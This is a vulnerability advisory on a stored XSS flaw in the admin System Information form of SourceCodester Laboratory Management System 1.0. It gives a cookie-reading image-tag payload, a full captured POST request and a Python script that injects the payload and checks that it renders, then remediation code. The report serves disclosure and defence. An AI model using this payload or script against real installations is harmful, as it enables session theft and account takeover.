Stored Cross-Site Scripting Vulnerability in SourceCodester Laboratory Management System 1.0
Vendor: Sourcecodester
Product: Laboratory Management System 1.0
Product URL: Laboratory Management System 1.0

Executive Summary
A stored cross-site scripting (XSS) vulnerability in Laboratory Management System 1.0 and earlier allows an attacker to inject JavaScript through the "System Information" form (the system name, submitted as the name parameter). The injected code is saved by the application and executes every time any user, staff member or administrator loads a page that renders the stored value. Because the script runs in the application's origin it can read document.cookie, so if the session cookie is not protected with the HttpOnly flag the result is session hijacking and account takeover.

Issue Details
Vulnerability Name: Stored XSS in System Information
Severity: High
Affected URL: php-lms/admin/?page=system_info (form); the data is submitted to php-lms/classes/SystemSettings.php?f=update_settings
Affected Parameter: name (the "System Information" / system name field)
HTTP Method: POST

Issue Description
The "System Information" settings form neither validates nor encodes the system name before storing and displaying it. An attacker submits the malicious JavaScript in the name parameter of the POST request to SystemSettings.php?f=update_settings (the page admin/?page=system_info is only the front end for that request). In the example below the attacker replaces the name value with an image tag whose onerror handler reads the authentication cookie. Note that the form is part of the admin interface and the captured request carries an authenticated PHPSESSID cookie, so exploitation as shown requires administrator access; the stored payload then fires for every user who views a page that renders the system name.

Proof Of Concept
Configure a web proxy in your browser.
Navigate to the URL in the browser http://localhost/php-lms/admin/?page=system_info
Fill in the input fields with any values and submit the form. Intercept the request in the web proxy, replace the value of the name parameter (the "System Information" field) with the payload shown below, and forward the request to the server.
Content-Disposition: form-data; name="name"
"><img src=x onerror=alert(document.cookie)>
Reload the settings page, or any page that displays the system name: the stored image tag executes and the alert shows the session cookie.
https://drive.google.com/file/d/1Fm7ppEvqs5UrJOK7EuMMQM4X4KpPTBTq/view?usp=drive_link
https://drive.google.com/file/d/1xUbfvAwPu70JZrQoomgWTulL4t5j9zbF/view?usp=drive_link
Payload:
Content-Disposition: form-data; name="name"
"><img src=x onerror=alert(document.cookie)>
Request:
POST /php-lms/classes/SystemSettings.php?f=update_settings HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------38752725403898646351608141163
Content-Length: 663
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lms/admin/?page=system_info
Cookie: PHPSESSID=mmoofhiuab699hj8pkoi61nmnr
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="name"
"><img src=x onerror=alert(document.cookie)>
-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="short_name"
LMS - PHP
-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
-----------------------------38752725403898646351608141163
Content-Disposition: form-data; name="cover"; filename=""
Content-Type: application/octet-stream
-----------------------------38752725403898646351608141163--
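The procedure above, as an added example script that is not part of the original report: it builds the same multipart/form-data request, sends it to the update_settings endpoint, then fetches the settings page and parses it for any element carrying an on* event handler, which is the check that the payload was stored and is rendered as live markup rather than as text. The install path http://localhost/php-lms, the PHPSESSID value and the boundary string are assumptions; the two network requests only run when the script is executed directly, and the helpers work offline on the constructed sample markup.

```python
"""Reproduce and verify the stored XSS in the System Information form.

Added example, not part of the original report. Assumptions (see the
constants below): the application is installed at http://localhost/php-lms
and SESSION_ID is the PHPSESSID of an authenticated administrator. Only
exploit() touches the network; the helpers run offline.
"""
import urllib.request
from html.parser import HTMLParser

BASE = "http://localhost/php-lms"                 # assumed install path, as in the captured request
SESSION_ID = "REPLACE_WITH_ADMIN_PHPSESSID"       # assumption: valid admin session cookie
PAYLOAD = '"><img src=x onerror=alert(document.cookie)>'  # payload from the report
BOUNDARY = "----AddedExampleBoundary7f3c"         # assumed boundary; must not occur in any field


def build_multipart(fields, boundary=BOUNDARY):
    """Build a multipart/form-data body shaped like the captured request.

    fields is a list of (name, value) pairs. A value of None emits an empty
    file part with an empty filename, matching the report's img/cover parts.
    """
    lines = []
    for name, value in fields:
        lines.append(f"--{boundary}")
        if value is None:
            lines.append(f'Content-Disposition: form-data; name="{name}"; filename=""')
            lines.append("Content-Type: application/octet-stream")
            lines.append("")          # end of part headers
            lines.append("")          # empty file body
        else:
            lines.append(f'Content-Disposition: form-data; name="{name}"')
            lines.append("")          # end of part headers
            lines.append(value)
    lines.append(f"--{boundary}--")
    lines.append("")
    return "\r\n".join(lines).encode("utf-8")


class EventHandlerFinder(HTMLParser):
    """Collect every start tag that carries an on* attribute (onerror, onload, ...).

    A stored name that is correctly encoded never produces such a tag, because
    &lt;img ...&gt; is text, not markup.
    """

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        handlers = [(k, v) for k, v in attrs if k.lower().startswith("on")]
        if handlers:
            self.hits.append((tag, handlers))


def find_event_handlers(page_html):
    """Return [(tag, [(attr, value), ...]), ...] for tags with inline event handlers."""
    finder = EventHandlerFinder()
    finder.feed(page_html)
    finder.close()
    return finder.hits


# Constructed samples of the settings form's name input after the update:
# the stored value echoed unencoded (vulnerable) and HTML-encoded (fixed).
SAMPLE_VULNERABLE = f'<input type="text" name="name" value="{PAYLOAD}">'
SAMPLE_ENCODED = ('<input type="text" name="name" '
                  'value="&quot;&gt;&lt;img src=x onerror=alert(document.cookie)&gt;">')


def exploit(session_id=SESSION_ID, base=BASE):
    """Send the payload to update_settings, then fetch the settings page and check it."""
    body = build_multipart([("name", PAYLOAD), ("short_name", "LMS - PHP"),
                            ("img", None), ("cover", None)])
    cookie = f"PHPSESSID={session_id}"
    update = urllib.request.Request(
        f"{base}/classes/SystemSettings.php?f=update_settings",
        data=body, method="POST",
        headers={"Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
                 "Cookie": cookie, "X-Requested-With": "XMLHttpRequest"})
    with urllib.request.urlopen(update) as resp:
        resp.read()
    view = urllib.request.Request(f"{base}/admin/?page=system_info",
                                  headers={"Cookie": cookie})
    with urllib.request.urlopen(view) as resp:
        page = resp.read().decode("utf-8", errors="replace")
    return find_event_handlers(page)


if __name__ == "__main__":
    hits = exploit()
    print("stored payload rendered as live markup:" if hits else "no inline handlers found", hits)
```

The parser-based check is deliberately stricter than searching for the payload string: a page that shows the value as &lt;img ...&gt; still contains the text of the payload but produces no start tag with an onerror attribute, so find_event_handlers() returns an empty list for a fixed build and a non-empty list for a vulnerable one.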
Impact:
Stored XSS gives an attacker code execution in every victim's browser session: theft of session cookies leading to account takeover, exfiltration of sensitive data shown in the application, modification of page content, and redirection of users to malicious sites. Because the system name is a global setting that is rendered for everyone, a single injection affects every user of the application until the value is cleaned up.

Remediation:
Encode the stored value at the point of output, in every context where it is rendered: use htmlspecialchars() with ENT_QUOTES (so that double and single quotes are encoded as well as <, > and &) when the name is written into page text and into attribute values such as the settings form's value attribute; the "> prefix of the payload shows that breaking out of a quoted attribute is what makes the injection work. Validate the field on the server side as well (for example an allow-list of characters and a length limit for the system name) before it is stored, but treat validation as defence in depth, not as a substitute for output encoding. Set the HttpOnly flag on the PHPSESSID cookie so that a script which does run cannot read it, and consider a Content Security Policy that disallows inline event handlers.

References:
https://portswigger.net/web-security/cross-site-scripting/stored
https://owasp.org/www-community/attacks/xss/
Weakness Enumeration: CWE-79
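To make the output-encoding advice in the Remediation section concrete, here is an added example (not the project's code) that renders the stored system name the way the settings form would, first unencoded and then encoded. The application is PHP; html.escape(value, quote=True) in Python plays the role of htmlspecialchars($value, ENT_QUOTES, 'UTF-8') applied at the moment the value is written into the page. The form layout and the validation allow-list are assumptions for illustration.

```python
"""Output encoding for the stored system name: vulnerable vs. hardened rendering.

Added example, not the project's code. The application is PHP; html.escape(value)
below plays the role of htmlspecialchars($value, ENT_QUOTES, 'UTF-8') applied at
the moment the stored value is written into the page. The form layout and the
validation allow-list are assumptions for illustration.
"""
import html
import re

PAYLOAD = '"><img src=x onerror=alert(document.cookie)>'   # payload from the report


def render_settings_form_vulnerable(name):
    """Echo the stored value verbatim into an attribute and into page text.

    The leading "> of the payload closes the value attribute, so the <img>
    that follows becomes real markup and its onerror handler runs.
    """
    return (f"<title>{name}</title>\n"
            f'<input type="text" name="name" value="{name}">')


def render_settings_form_hardened(name):
    """Encode at output. quote=True also encodes " and ', so the value cannot
    terminate a quoted attribute; < and > become &lt; and &gt; in text context."""
    safe = html.escape(name, quote=True)
    return (f"<title>{safe}</title>\n"
            f'<input type="text" name="name" value="{safe}">')


# Assumed allow-list for the system name: letters, digits, space and a few
# punctuation marks, at most 100 characters. Defence in depth only; the output
# encoding above is what actually prevents the injection.
_NAME_RE = re.compile(r"[A-Za-z0-9 .,&()'\-]{1,100}")


def is_valid_system_name(name):
    """Server-side validation to apply before the value is stored."""
    return _NAME_RE.fullmatch(name) is not None


def contains_live_tag(rendered, tag="img"):
    """Coarse check: does the rendered HTML contain a real <tag ...> start tag?
    An encoded &lt;img does not match."""
    return f"<{tag}" in rendered.lower()
```

Note that the encoding happens in the rendering function, not when the value is saved: encoding on input would corrupt legitimate names containing & or quotes and would still leave any other code path that reads the raw value exposed.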
This report describes the stored XSS vulnerability in the name parameter of the System Information form (php-lms/admin/?page=system_info), with a proof of concept, its impact, remediation steps and references for further guidance on mitigation.